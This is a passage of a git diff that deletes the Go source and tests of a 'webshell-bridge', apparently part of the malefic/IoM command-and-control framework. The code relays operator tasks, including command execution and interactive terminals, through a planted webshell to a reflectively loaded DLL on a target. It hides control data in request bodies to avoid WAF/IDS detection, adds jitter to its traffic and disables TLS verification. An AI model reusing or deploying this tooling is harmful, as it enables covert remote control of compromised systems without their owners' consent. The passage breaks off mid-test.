return - } - - logs.Log.Importantf("pipeline %s active", runtime.name) - go b.checkinLoop(runtime) - b.handleSpiteStream(runtime) -} - -func (b *Bridge) closeRuntimeSessions(runtime *pipelineRuntime) { - // Cancel all streaming task pumps first. - runtime.streamTasks.Range(func(key, value interface{}) bool { - value.(context.CancelFunc)() - runtime.streamTasks.Delete(key) - return true - }) - - runtime.sessions.Range(func(key, value interface{}) bool { - runtime.sessions.Delete(key) - _ = value.(*Session).Close() - return true - }) -} - -// listenerCtx returns a context with listener metadata. 
-func (b *Bridge) listenerCtx(parent context.Context) context.Context { - return metadata.NewOutgoingContext(parent, metadata.Pairs( - "listener_id", b.cfg.ListenerName, - "listener_ip", b.cfg.ListenerIP, - )) -} - -// pipelineCtx returns a context with pipeline metadata. -func (b *Bridge) pipelineCtx(parent context.Context, pipelineName string) context.Context { - return metadata.NewOutgoingContext(parent, metadata.Pairs( - "listener_id", b.cfg.ListenerName, - "listener_ip", b.cfg.ListenerIP, - "pipeline_id", pipelineName, - )) -} - -func (b *Bridge) sessionCtx(parent context.Context, sessionID string) context.Context { - return metadata.NewOutgoingContext(parent, metadata.Pairs( - "session_id", sessionID, - "listener_id", b.cfg.ListenerName, - "listener_ip", b.cfg.ListenerIP, - "timestamp", strconv.FormatInt(time.Now().Unix(), 10), - )) -} - -// handleSpiteStream receives task requests from the server and forwards them -// through the malefic channel to the bind DLL on the target. -func (b *Bridge) handleSpiteStream(runtime *pipelineRuntime) { - for { - req, err := runtime.spiteStream.Recv() - if err != nil { - if runtime.ctx.Err() != nil || errors.Is(err, io.EOF) { - return - } - switch status.Code(err) { - case codes.Canceled, codes.Unavailable: - if runtime.ctx.Err() != nil { - return - } - } - logs.Log.Errorf("spite stream recv (%s): %v", runtime.name, err) - return - } - - spite := req.GetSpite() - sessionID := req.GetSession().GetSessionId() - if spite == nil || sessionID == "" { - continue - } - - var taskID uint32 - if t := req.GetTask(); t != nil { - taskID = t.GetTaskId() - } - - logs.Log.Debugf("task %d for session %s: %s", taskID, sessionID, spite.Name) - go b.forwardToSession(runtime, sessionID, taskID, req) - } -} - -func (b *Bridge) clearActiveRuntime(runtime *pipelineRuntime) { - if runtime == nil { - return - } - if runtime.spiteStream != nil { - _ = runtime.spiteStream.CloseSend() - } - - b.activeMu.Lock() - if b.active == runtime { - b.active = 
nil - } - b.activeMu.Unlock() - - b.closeRuntimeSessions(runtime) -} - -func (b *Bridge) syncPipelineStop(name string) { - if b.rpc == nil || name == "" { - return - } - _, err := b.rpc.StopPipeline(context.Background(), &clientpb.CtrlPipeline{ - Name: name, - ListenerId: b.cfg.ListenerName, - }) - if err != nil { - logs.Log.Errorf("sync failed pipeline stop for %s: %v", name, err) - } -} - -// forwardToSession routes a SpiteRequest to the appropriate session. -// Streaming tasks (Task.Total < 0) get a persistent response pump; unary tasks -// use the simple request/response path. -func (b *Bridge) forwardToSession(runtime *pipelineRuntime, sessionID string, taskID uint32, req *clientpb.SpiteRequest) { - sess, ok := runtime.sessions.Load(sessionID) - if !ok { - err := fmt.Errorf("session %s not found", sessionID) - logs.Log.Warnf("%v, dropping task %d", err, taskID) - b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) - return - } - - session := sess.(*Session) - isStreaming := req.GetTask().GetTotal() < 0 - streamKey := fmt.Sprintf("%s:%d", sessionID, taskID) - - if isStreaming { - // Check if a pump already exists (subsequent command on same stream, e.g. PTY input) - if _, exists := runtime.streamTasks.Load(streamKey); exists { - if err := session.SendTaskSpite(taskID, req.GetSpite()); err != nil { - logs.Log.Errorf("session %s task %d stream send: %v", sessionID, taskID, err) - b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) - } - return - } - - // New streaming task: open channel, send initial request, start pump. 
- ch := session.OpenTaskStream(taskID) - if err := session.SendTaskSpite(taskID, req.GetSpite()); err != nil { - session.CloseTaskStream(taskID) - logs.Log.Errorf("session %s task %d initial send: %v", sessionID, taskID, err) - b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) - return - } - - pumpCtx, pumpCancel := context.WithCancel(runtime.ctx) - runtime.streamTasks.Store(streamKey, pumpCancel) - go b.responsePump(runtime, session, sessionID, taskID, streamKey, ch, pumpCtx, pumpCancel) - return - } - - // Unary path: send request, wait for one response. - resp, err := session.HandleUnary(taskID, req.GetSpite()) - if err != nil { - logs.Log.Errorf("session %s task %d error: %v", sessionID, taskID, err) - if !session.Alive() { - logs.Log.Warnf("session %s channel dead, removing from runtime", sessionID) - runtime.sessions.Delete(sessionID) - _ = session.Close() - } - b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) - return - } - if resp == nil { - err := fmt.Errorf("empty response from DLL") - logs.Log.Errorf("session %s task %d error: %v", sessionID, taskID, err) - b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) - return - } - - if err := b.sendSpiteResponse(runtime, sessionID, taskID, resp); err != nil { - logs.Log.Errorf("spite stream send: %v", err) - } -} - -// responsePump reads streaming responses from the DLL channel and forwards -// each one to the server's SpiteStream. Runs until the channel is closed, -// the context is cancelled, or a send error occurs. 
-func (b *Bridge) responsePump( - runtime *pipelineRuntime, - session *Session, - sessionID string, - taskID uint32, - streamKey string, - ch <-chan *implantpb.Spite, - ctx context.Context, - cancel context.CancelFunc, -) { - defer func() { - cancel() - runtime.streamTasks.Delete(streamKey) - session.CloseTaskStream(taskID) - logs.Log.Debugf("response pump exited for task %d on session %s", taskID, sessionID) - }() - - for { - select { - case <-ctx.Done(): - return - case spite, ok := <-ch: - if !ok { - // Channel closed (recvLoop exit or session teardown) - return - } - if err := b.sendSpiteResponse(runtime, sessionID, taskID, spite); err != nil { - logs.Log.Errorf("stream pump send for task %d: %v", taskID, err) - return - } - } - } -} - -func (b *Bridge) sendTaskError(runtime *pipelineRuntime, sessionID string, taskID uint32, req *implantpb.Spite, err error) { - name := "" - if req != nil { - name = req.GetName() - } - if sendErr := b.sendSpiteResponse(runtime, sessionID, taskID, taskErrorSpite(taskID, name, err)); sendErr != nil { - logs.Log.Debugf("send task error response failed: %v", sendErr) - } -} - -func taskErrorSpite(taskID uint32, name string, err error) *implantpb.Spite { - return &implantpb.Spite{ - Name: name, - TaskId: taskID, - Error: iomtypes.MaleficErrorTaskError, - Status: &implantpb.Status{ - TaskId: taskID, - Status: iomtypes.TaskErrorOperatorError, - Error: err.Error(), - }, - Body: &implantpb.Spite_Empty{ - Empty: &implantpb.Empty{}, - }, - } -} - -func (b *Bridge) sendSpiteResponse(runtime *pipelineRuntime, sessionID string, taskID uint32, spite *implantpb.Spite) error { - runtime.sendMu.Lock() - defer runtime.sendMu.Unlock() - - return runtime.spiteStream.Send(&clientpb.SpiteResponse{ - ListenerId: b.cfg.ListenerName, - SessionId: sessionID, - TaskId: taskID, - Spite: spite, - }) -} - -// checkinLoop sends periodic heartbeats for all registered sessions. 
-func (b *Bridge) checkinLoop(runtime *pipelineRuntime) { - ticker := time.NewTicker(checkinInterval) - defer ticker.Stop() - - for { - select { - case <-runtime.ctx.Done(): - return - case <-ticker.C: - runtime.sessions.Range(func(key, value interface{}) bool { - sess := value.(*Session) - if !sess.Alive() { - logs.Log.Warnf("session %s channel dead, removing", sess.ID) - runtime.sessions.Delete(key) - _ = sess.Close() - return true - } - sess.Checkin(b.rpc, b.sessionCtx(runtime.ctx, sess.ID)) - return true - }) - } - } -} diff --git a/server/cmd/webshell-bridge/bridge_test.go b/server/cmd/webshell-bridge/bridge_test.go deleted file mode 100644 index 5ac64c06..00000000 --- a/server/cmd/webshell-bridge/bridge_test.go +++ /dev/null @@ -1,269 +0,0 @@ -package main - -import ( - "context" - "errors" - "fmt" - "io" - "sync" - "testing" - "time" - - "github.com/chainreactors/IoM-go/proto/client/clientpb" - "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "github.com/chainreactors/IoM-go/proto/services/listenerrpc" - "google.golang.org/grpc" - "google.golang.org/grpc/metadata" - "google.golang.org/protobuf/proto" -) - -type fakeBridgeRPC struct { - listenerrpc.ListenerRPCClient - - mu sync.Mutex - stopCalls []*clientpb.CtrlPipeline - spiteStream listenerrpc.ListenerRPC_SpiteStreamClient -} - -func (f *fakeBridgeRPC) SpiteStream(ctx context.Context, opts ...grpc.CallOption) (listenerrpc.ListenerRPC_SpiteStreamClient, error) { - if f.spiteStream == nil { - return nil, errors.New("missing spite stream") - } - return f.spiteStream, nil -} - -func (f *fakeBridgeRPC) StopPipeline(ctx context.Context, in *clientpb.CtrlPipeline, opts ...grpc.CallOption) (*clientpb.Empty, error) { - f.mu.Lock() - defer f.mu.Unlock() - f.stopCalls = append(f.stopCalls, proto.Clone(in).(*clientpb.CtrlPipeline)) - return &clientpb.Empty{}, nil -} - -func (f *fakeBridgeRPC) StopCalls() []*clientpb.CtrlPipeline { - f.mu.Lock() - defer f.mu.Unlock() - out := make([]*clientpb.CtrlPipeline, 
len(f.stopCalls)) - copy(out, f.stopCalls) - return out -} - -type fakeSpiteStream struct { - grpc.ClientStream - - closeOnce sync.Once - closed chan struct{} -} - -func newFakeSpiteStream() *fakeSpiteStream { - return &fakeSpiteStream{ - closed: make(chan struct{}), - } -} - -func (f *fakeSpiteStream) Header() (metadata.MD, error) { return nil, nil } -func (f *fakeSpiteStream) Trailer() metadata.MD { return nil } -func (f *fakeSpiteStream) CloseSend() error { - f.closeOnce.Do(func() { close(f.closed) }) - return nil -} -func (f *fakeSpiteStream) Context() context.Context { return context.Background() } -func (f *fakeSpiteStream) SendMsg(m interface{}) error { return nil } -func (f *fakeSpiteStream) RecvMsg(m interface{}) error { <-f.closed; return io.EOF } -func (f *fakeSpiteStream) Send(*clientpb.SpiteResponse) error { return nil } -func (f *fakeSpiteStream) Recv() (*clientpb.SpiteRequest, error) { - <-f.closed - return nil, io.EOF -} - -// collectingSpiteStream records all sent SpiteResponses for test assertions. 
-type collectingSpiteStream struct { - grpc.ClientStream - - mu sync.Mutex - sent []*clientpb.SpiteResponse - closed chan struct{} - recvOnce sync.Once -} - -func newCollectingSpiteStream() *collectingSpiteStream { - return &collectingSpiteStream{closed: make(chan struct{})} -} - -func (s *collectingSpiteStream) Header() (metadata.MD, error) { return nil, nil } -func (s *collectingSpiteStream) Trailer() metadata.MD { return nil } -func (s *collectingSpiteStream) CloseSend() error { - s.recvOnce.Do(func() { close(s.closed) }) - return nil -} -func (s *collectingSpiteStream) Context() context.Context { return context.Background() } -func (s *collectingSpiteStream) SendMsg(m interface{}) error { return nil } -func (s *collectingSpiteStream) RecvMsg(m interface{}) error { <-s.closed; return io.EOF } -func (s *collectingSpiteStream) Send(resp *clientpb.SpiteResponse) error { - s.mu.Lock() - s.sent = append(s.sent, proto.Clone(resp).(*clientpb.SpiteResponse)) - s.mu.Unlock() - return nil -} -func (s *collectingSpiteStream) Recv() (*clientpb.SpiteRequest, error) { - <-s.closed - return nil, io.EOF -} -func (s *collectingSpiteStream) Sent() []*clientpb.SpiteResponse { - s.mu.Lock() - defer s.mu.Unlock() - out := make([]*clientpb.SpiteResponse, len(s.sent)) - copy(out, s.sent) - return out -} - -func TestForwardToSessionUnary(t *testing.T) { - srv, _ := startMockWebshell(t) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - ch.StartRecvLoop() - - session := &Session{ - ID: "test-session", - PipelineID: "test-pipeline", - ListenerID: "test-listener", - channel: ch, - } - - stream := newCollectingSpiteStream() - runtimeCtx, runtimeCancel := context.WithCancel(context.Background()) - defer runtimeCancel() - - runtime := &pipelineRuntime{ - name: "test-pipeline", - ctx: runtimeCtx, - cancel: runtimeCancel, - spiteStream: stream, - done: make(chan struct{}), - } - 
runtime.sessions.Store(session.ID, session) - - bridge := &Bridge{cfg: &Config{ListenerName: "test-listener"}} - - req := &clientpb.SpiteRequest{ - Session: &clientpb.Session{SessionId: session.ID}, - Task: &clientpb.Task{TaskId: 1, Total: 1}, - Spite: &implantpb.Spite{Name: "exec"}, - } - - bridge.forwardToSession(runtime, session.ID, 1, req) - - sent := stream.Sent() - if len(sent) != 1 { - t.Fatalf("expected 1 response, got %d", len(sent)) - } - if sent[0].GetSpite().GetName() != "resp:exec" { - t.Errorf("expected 'resp:exec', got %q", sent[0].GetSpite().GetName()) - } -} - -func TestForwardToSessionStreaming(t *testing.T) { - srv, mock := startMockWebshell(t) - - var callCount int - var mu sync.Mutex - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte("LOADED"), 200 - } - if stage == "init" { - regData, _ := proto.Marshal(mock.register) - sid := make([]byte, 4) - sid[0] = byte(mock.sessionID) - return append(sid, regData...), 200 - } - if stage == "spite" { - // Parse input - inSpites := &implantpb.Spites{} - if len(body) > 0 { - proto.Unmarshal(body, inSpites) - } - - mu.Lock() - callCount++ - n := callCount - mu.Unlock() - - // First few calls: return streaming responses for task 500 - if n <= 3 { - resp := &implantpb.Spites{ - Spites: []*implantpb.Spite{{ - Name: fmt.Sprintf("stream-resp-%d", n-1), - TaskId: 500, - }}, - } - data, _ := proto.Marshal(resp) - return data, 200 - } - empty, _ := proto.Marshal(&implantpb.Spites{}) - return empty, 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - ch.StartRecvLoop() - - session := &Session{ - ID: "test-session", - PipelineID: "test-pipeline", - ListenerID: "test-listener", - channel: ch, - } - - stream := newCollectingSpiteStream() - runtimeCtx, runtimeCancel := context.WithCancel(context.Background()) - defer runtimeCancel() - - runtime := 
&pipelineRuntime{ - name: "test-pipeline", - ctx: runtimeCtx, - cancel: runtimeCancel, - spiteStream: stream, - done: make(chan struct{}), - } - runtime.sessions.Store(session.ID, session) - - bridge := &Bridge{cfg: &Config{ListenerName: "test-listener"}} - - req := &clientpb.SpiteRequest{ - Session: &clientpb.Session{SessionId: session.ID}, - Task: &clientpb.Task{TaskId: 500, Total: -1}, - Spite: &implantpb.Spite{Name: "start-pty"}, - } - - bridge.forwardToSession(runtime, session.ID, 500, req) - - // Wait for streaming responses - deadline := time.Now().Add(5 * time.Second) - for time.Now().Before(deadline) { - sent := stream.Sent() - if len(sent) >= 2 { - break - } - time.Sleep(100 * time.Millisecond) - } - - sent := stream.Sent() - if len(sent) < 2 { - t.Fatalf("expected at least 2 streaming responses, got %d", len(sent)) - } -} - -var _ listenerrpc.ListenerRPC_SpiteStreamClient = (*fakeSpiteStream)(nil) -var _ listenerrpc.ListenerRPC_SpiteStreamClient = (*collectingSpiteStream)(nil) -var _ listenerrpc.ListenerRPCClient = (*fakeBridgeRPC)(nil) diff --git a/server/cmd/webshell-bridge/channel.go b/server/cmd/webshell-bridge/channel.go deleted file mode 100644 index 4bf4172d..00000000 --- a/server/cmd/webshell-bridge/channel.go +++ /dev/null @@ -1,561 +0,0 @@ -package main - -import ( - "bytes" - "context" - "crypto/hmac" - "crypto/sha256" - "crypto/tls" - "encoding/binary" - "encoding/hex" - "encoding/json" - "fmt" - "io" - "math/rand" - "net/http" - "strings" - "sync" - "sync/atomic" - "time" - - "github.com/chainreactors/IoM-go/proto/client/clientpb" - "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "github.com/chainreactors/logs" - "google.golang.org/protobuf/proto" -) - -const ( - httpTimeout = 30 * time.Second - longPollTimeout = 10 * time.Second - pollIdleInterval = 5 * time.Second - pollActiveInterval = 200 * time.Millisecond - jitterFactor = 0.3 - streamChanBuffer = 16 - streamReconnectDelay = 2 * time.Second - streamMaxReconnect = 5 - 
streamFrameMaxSize = 10 * 1024 * 1024 // 10MB sanity limit -) - -// Stage codes encoded in body envelope (no HTTP headers). -const ( - stageLoad byte = 0x01 - stageStatus byte = 0x02 - stageInit byte = 0x03 - stageSpite byte = 0x04 - stageStream byte = 0x05 - stageDeps byte = 0x06 -) - -// ChannelIface abstracts the communication channel to the bridge DLL. -type ChannelIface interface { - Connect(ctx context.Context) error - Handshake() (*implantpb.Register, error) - StartRecvLoop() - Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) - OpenStream(taskID uint32) <-chan *implantpb.Spite - SendSpite(taskID uint32, spite *implantpb.Spite) error - CloseStream(taskID uint32) - CloseAllStreams() - WithSecure(keyPair *clientpb.KeyPair) - Close() error - SessionID() uint32 - IsClosed() bool -} - -// Channel communicates with the bridge DLL through HTTP POST requests. -// All control information (stage, token, session ID) is encoded in a body -// envelope prefix — no custom HTTP headers, reducing WAF/IDS fingerprint. -// -// Body envelope format: -// -// [1B stage][4B sessionID LE][1B token_len][token bytes][payload...] -// -// Payload is stage-specific: -// - load: raw DLL bytes -// - status: empty -// - init: empty -// - spite: Spites protobuf -// - stream: empty -// - deps: [1B dep_name_len][dep_name][jar bytes] -type Channel struct { - webshellURL string - token string - client *http.Client - streamClient *http.Client // no timeout, for long-lived stream connection - - sid uint32 - sidSet atomic.Bool - closed atomic.Bool - closeCh chan struct{} - - lastStatus *StatusResponse // populated by Connect() - streamSupported atomic.Bool - - pendMu sync.Mutex - pending map[uint32]chan *implantpb.Spite - - recvCancel context.CancelFunc -} - -// NewChannel creates a channel that communicates with the DLL through -// the webshell's body-envelope HTTP endpoint. 
-func NewChannel(webshellURL, token string) *Channel { - return &Channel{ - webshellURL: webshellURL, - token: token, - client: &http.Client{ - Timeout: longPollTimeout + 5*time.Second, - Transport: &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - }, - }, - streamClient: &http.Client{ - Timeout: 0, - Transport: &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - }, - }, - pending: make(map[uint32]chan *implantpb.Spite), - closeCh: make(chan struct{}), - } -} - -// StatusResponse is the structured status returned by the webshell. -type StatusResponse struct { - Ready bool `json:"ready"` - Method string `json:"method"` - DepsPresent bool `json:"deps_present"` - BridgeVersion string `json:"bridge_version"` -} - -// buildEnvelope constructs the body prefix: [1B stage][4B sid LE][1B token_len][token]. -func (c *Channel) buildEnvelope(stage byte, payload []byte) []byte { - tok := computeToken(c.token) - tokLen := len(tok) - if tokLen > 255 { - tokLen = 255 - tok = tok[:255] - } - - // envelope header: 1 + 4 + 1 + tokLen - hdrLen := 6 + tokLen - buf := make([]byte, hdrLen+len(payload)) - buf[0] = stage - binary.LittleEndian.PutUint32(buf[1:5], c.sid) - buf[5] = byte(tokLen) - copy(buf[6:6+tokLen], tok) - copy(buf[hdrLen:], payload) - return buf -} - -// Connect verifies the webshell is reachable and the DLL is loaded. 
-func (c *Channel) Connect(ctx context.Context) error { - body, err := c.doRequest(ctx, stageStatus, nil) - if err != nil { - return fmt.Errorf("connect: %w", err) - } - text := strings.TrimSpace(string(body)) - - if len(text) > 0 && text[0] == '{' { - var sr StatusResponse - if jsonErr := json.Unmarshal([]byte(text), &sr); jsonErr == nil { - c.lastStatus = &sr - if !sr.Ready { - return fmt.Errorf("DLL not loaded (status: %s)", text) - } - return nil - } - } - - if text != "LOADED" { - return fmt.Errorf("DLL not loaded (status: %s)", text) - } - return nil -} - -// LoadDLL sends the bridge DLL to the webshell for reflective loading. -func (c *Channel) LoadDLL(ctx context.Context, dllBytes []byte) error { - _, err := c.doRequest(ctx, stageLoad, dllBytes) - if err != nil { - return fmt.Errorf("load DLL: %w", err) - } - return nil -} - -// DeliverDep sends a dependency file (e.g., jna.jar) to the webshell. -// Payload format for deps stage: [1B dep_name_len][dep_name][jar bytes]. -func (c *Channel) DeliverDep(ctx context.Context, depName string, data []byte) error { - nameBytes := []byte(depName) - if len(nameBytes) > 255 { - nameBytes = nameBytes[:255] - } - payload := make([]byte, 1+len(nameBytes)+len(data)) - payload[0] = byte(len(nameBytes)) - copy(payload[1:1+len(nameBytes)], nameBytes) - copy(payload[1+len(nameBytes):], data) - - respBody, err := c.doRequest(ctx, stageDeps, payload) - if err != nil { - return fmt.Errorf("deliver dep %s: %w", depName, err) - } - logs.Log.Debugf("dep delivered: %s -> %s", depName, strings.TrimSpace(string(respBody))) - return nil -} - -// Handshake calls bridge_init on the DLL via the webshell and returns -// the Register message containing SysInfo and module list. 
-func (c *Channel) Handshake() (*implantpb.Register, error) { - body, err := c.doRequest(context.Background(), stageInit, nil) - if err != nil { - return nil, fmt.Errorf("handshake: %w", err) - } - if len(body) < 4 { - return nil, fmt.Errorf("handshake response too short: %d bytes", len(body)) - } - - c.sid = binary.LittleEndian.Uint32(body[:4]) - c.sidSet.Store(true) - - reg := &implantpb.Register{} - if err := proto.Unmarshal(body[4:], reg); err != nil { - return nil, fmt.Errorf("unmarshal register: %w", err) - } - - logs.Log.Debugf("handshake: sid=%d name=%s modules=%v", c.sid, reg.Name, reg.Module) - return reg, nil -} - -// StartRecvLoop starts the background receive loop. It tries StreamHTTP first -// (long-lived HTTP response stream) and falls back to polling if unsupported. -func (c *Channel) StartRecvLoop() { - ctx, cancel := context.WithCancel(context.Background()) - c.recvCancel = cancel - go c.recvLoop(ctx) -} - -func (c *Channel) recvLoop(ctx context.Context) { - if c.tryStreamLoop(ctx) { - for attempt := 1; attempt <= streamMaxReconnect; attempt++ { - select { - case <-ctx.Done(): - return - case <-c.closeCh: - return - case <-time.After(jitter(streamReconnectDelay)): - } - if c.tryStreamLoop(ctx) { - attempt = 0 - } - } - logs.Log.Warn("stream reconnect exhausted, falling back to poll mode") - } - logs.Log.Debug("using poll mode for streaming tasks") - c.pollLoop(ctx) -} - -// tryStreamLoop opens a long-lived POST with stage=stream envelope and reads -// length-prefixed frames from the response body. 
-func (c *Channel) tryStreamLoop(ctx context.Context) bool { - envelope := c.buildEnvelope(stageStream, nil) - req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bytes.NewReader(envelope)) - if err != nil { - logs.Log.Debugf("stream: request create error: %v", err) - return false - } - req.Header.Set("Content-Type", "application/octet-stream") - - resp, err := c.streamClient.Do(req) - if err != nil { - logs.Log.Debugf("stream: connection error: %v", err) - return false - } - defer resp.Body.Close() - - if resp.StatusCode != http.StatusOK { - logs.Log.Debugf("stream: HTTP %d, not supported", resp.StatusCode) - return false - } - - c.streamSupported.Store(true) - logs.Log.Important("stream mode active") - - if err := c.readStreamFrames(ctx, resp.Body); err != nil { - if ctx.Err() != nil { - return true - } - logs.Log.Debugf("stream: read error: %v", err) - } - return true -} - -func (c *Channel) readStreamFrames(ctx context.Context, r io.Reader) error { - for { - select { - case <-ctx.Done(): - return ctx.Err() - case <-c.closeCh: - return nil - default: - } - - data, err := readFrame(r) - if err != nil { - return err - } - if len(data) > 0 { - c.dispatchResponse(data) - } - } -} - -func readFrame(r io.Reader) ([]byte, error) { - var lenBuf [4]byte - if _, err := io.ReadFull(r, lenBuf[:]); err != nil { - return nil, err - } - frameLen := binary.BigEndian.Uint32(lenBuf[:]) - if frameLen == 0 { - return nil, nil - } - if frameLen > streamFrameMaxSize { - return nil, fmt.Errorf("frame too large: %d bytes", frameLen) - } - payload := make([]byte, frameLen) - if _, err := io.ReadFull(r, payload); err != nil { - return nil, err - } - return payload, nil -} - -func (c *Channel) pollLoop(ctx context.Context) { - for { - c.pendMu.Lock() - hasPending := len(c.pending) > 0 - c.pendMu.Unlock() - - if !hasPending { - select { - case <-ctx.Done(): - return - case <-c.closeCh: - return - case <-time.After(jitter(pollIdleInterval)): - } - continue - } - - empty := 
&implantpb.Spites{} - data, err := proto.Marshal(empty) - if err != nil { - continue - } - respBody, err := c.doRequest(ctx, stageSpite, data) - if err != nil { - if ctx.Err() != nil { - return - } - logs.Log.Debugf("poll error: %v", err) - select { - case <-ctx.Done(): - return - case <-c.closeCh: - return - case <-time.After(jitter(pollActiveInterval)): - } - continue - } - - hasData := c.dispatchResponse(respBody) - - var interval time.Duration - if hasData { - interval = pollActiveInterval - } else { - interval = pollIdleInterval - } - select { - case <-ctx.Done(): - return - case <-c.closeCh: - return - case <-time.After(jitter(interval)): - } - } -} - -// Forward sends a Spite and waits for a single response (unary request-response). -func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) { - if c.closed.Load() { - return nil, fmt.Errorf("channel closed") - } - - spite.TaskId = taskID - spites := &implantpb.Spites{Spites: []*implantpb.Spite{spite}} - data, err := proto.Marshal(spites) - if err != nil { - return nil, fmt.Errorf("marshal spite: %w", err) - } - - respBody, err := c.doRequest(context.Background(), stageSpite, data) - if err != nil { - return nil, fmt.Errorf("forward: %w", err) - } - - respSpites := &implantpb.Spites{} - if err := proto.Unmarshal(respBody, respSpites); err != nil { - return nil, fmt.Errorf("unmarshal response: %w", err) - } - - for _, s := range respSpites.GetSpites() { - if s.GetTaskId() == taskID { - return s, nil - } - } - - if len(respSpites.GetSpites()) > 0 { - for _, s := range respSpites.GetSpites() { - c.dispatchSpite(s) - } - } - - return nil, fmt.Errorf("no response for task %d", taskID) -} - -func (c *Channel) OpenStream(taskID uint32) <-chan *implantpb.Spite { - ch := make(chan *implantpb.Spite, streamChanBuffer) - c.pendMu.Lock() - c.pending[taskID] = ch - c.pendMu.Unlock() - return ch -} - -func (c *Channel) SendSpite(taskID uint32, spite *implantpb.Spite) error { - if 
c.closed.Load() { - return fmt.Errorf("channel closed") - } - - spite.TaskId = taskID - spites := &implantpb.Spites{Spites: []*implantpb.Spite{spite}} - data, err := proto.Marshal(spites) - if err != nil { - return fmt.Errorf("marshal: %w", err) - } - - respBody, err := c.doRequest(context.Background(), stageSpite, data) - if err != nil { - return err - } - - _ = c.dispatchResponse(respBody) - return nil -} - -func (c *Channel) CloseStream(taskID uint32) { - c.pendMu.Lock() - delete(c.pending, taskID) - c.pendMu.Unlock() -} - -func (c *Channel) CloseAllStreams() { - c.pendMu.Lock() - for id, ch := range c.pending { - close(ch) - delete(c.pending, id) - } - c.pendMu.Unlock() -} - -func (c *Channel) SessionID() uint32 { return c.sid } - -func (c *Channel) IsClosed() bool { return c.closed.Load() } - -func (c *Channel) WithSecure(_ *clientpb.KeyPair) {} - -func (c *Channel) Close() error { - if c.closed.Swap(true) { - return nil - } - close(c.closeCh) - if c.recvCancel != nil { - c.recvCancel() - } - c.CloseAllStreams() - return nil -} - -// doRequest sends a POST with body envelope, no custom headers. 
-func (c *Channel) doRequest(ctx context.Context, stage byte, payload []byte) ([]byte, error) { - envelope := c.buildEnvelope(stage, payload) - - req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bytes.NewReader(envelope)) - if err != nil { - return nil, err - } - req.Header.Set("Content-Type", "application/octet-stream") - - resp, err := c.client.Do(req) - if err != nil { - return nil, err - } - defer resp.Body.Close() - - if resp.StatusCode != http.StatusOK { - respBody, _ := io.ReadAll(resp.Body) - return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(respBody)) - } - - return io.ReadAll(resp.Body) -} - -func (c *Channel) dispatchResponse(body []byte) bool { - if len(body) == 0 { - return false - } - spites := &implantpb.Spites{} - if err := proto.Unmarshal(body, spites); err != nil { - logs.Log.Debugf("dispatch unmarshal error: %v", err) - return false - } - dispatched := false - for _, spite := range spites.GetSpites() { - c.dispatchSpite(spite) - dispatched = true - } - return dispatched -} - -func (c *Channel) dispatchSpite(spite *implantpb.Spite) { - taskID := spite.GetTaskId() - c.pendMu.Lock() - ch, ok := c.pending[taskID] - c.pendMu.Unlock() - if ok { - select { - case ch <- spite: - default: - logs.Log.Debugf("channel: pending full for task %d", taskID) - } - } -} - -// jitter adds ±jitterFactor random variation to an interval. -func jitter(d time.Duration) time.Duration { - delta := float64(d) * jitterFactor - return d + time.Duration(delta*(2*rand.Float64()-1)) -} - -// computeToken returns the token value for the body envelope. -// Short secrets (≤32 chars) are sent as-is. -// Longer secrets use time-based HMAC-SHA256 that rotates every 30 seconds. 
-func computeToken(secret string) string { - if secret == "" { - return "" - } - if len(secret) <= 32 { - return secret - } - window := time.Now().Unix() / 30 - mac := hmac.New(sha256.New, []byte(secret)) - _ = binary.Write(mac, binary.BigEndian, window) - return hex.EncodeToString(mac.Sum(nil)) -} diff --git a/server/cmd/webshell-bridge/channel_test.go b/server/cmd/webshell-bridge/channel_test.go deleted file mode 100644 index 71df0cb0..00000000 --- a/server/cmd/webshell-bridge/channel_test.go +++ /dev/null @@ -1,723 +0,0 @@ -package main - -import ( - "bytes" - "crypto/hmac" - "crypto/sha256" - "encoding/binary" - "encoding/hex" - "fmt" - "io" - "net/http" - "net/http/httptest" - "sync" - "testing" - "time" - - "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "google.golang.org/protobuf/proto" -) - -// mockWebshell simulates the webshell's X-Stage endpoints for testing. -type mockWebshell struct { - register *implantpb.Register - sessionID uint32 - - mu sync.Mutex - handler func(stage string, body []byte) ([]byte, int) // custom handler - - streamMu sync.Mutex - streamFrames [][]byte // length-prefixed frames to send for X-Stage: stream - streamDelay time.Duration -} - -func newMockWebshell() *mockWebshell { - return &mockWebshell{ - sessionID: 42, - register: &implantpb.Register{ - Name: "test-dll", - Module: []string{"exec", "upload", "download"}, - Sysinfo: &implantpb.SysInfo{ - Os: &implantpb.Os{ - Name: "Windows", - }, - }, - }, - } -} - -func (m *mockWebshell) ServeHTTP(w http.ResponseWriter, r *http.Request) { - stage := r.Header.Get("X-Stage") - body, _ := io.ReadAll(r.Body) - - m.mu.Lock() - handler := m.handler - m.mu.Unlock() - - if handler != nil { - respBody, status := handler(stage, body) - if status != 0 { - w.WriteHeader(status) - } - if respBody != nil { - w.Write(respBody) - } - return - } - - switch stage { - case "status": - w.Write([]byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`)) - case "init": - 
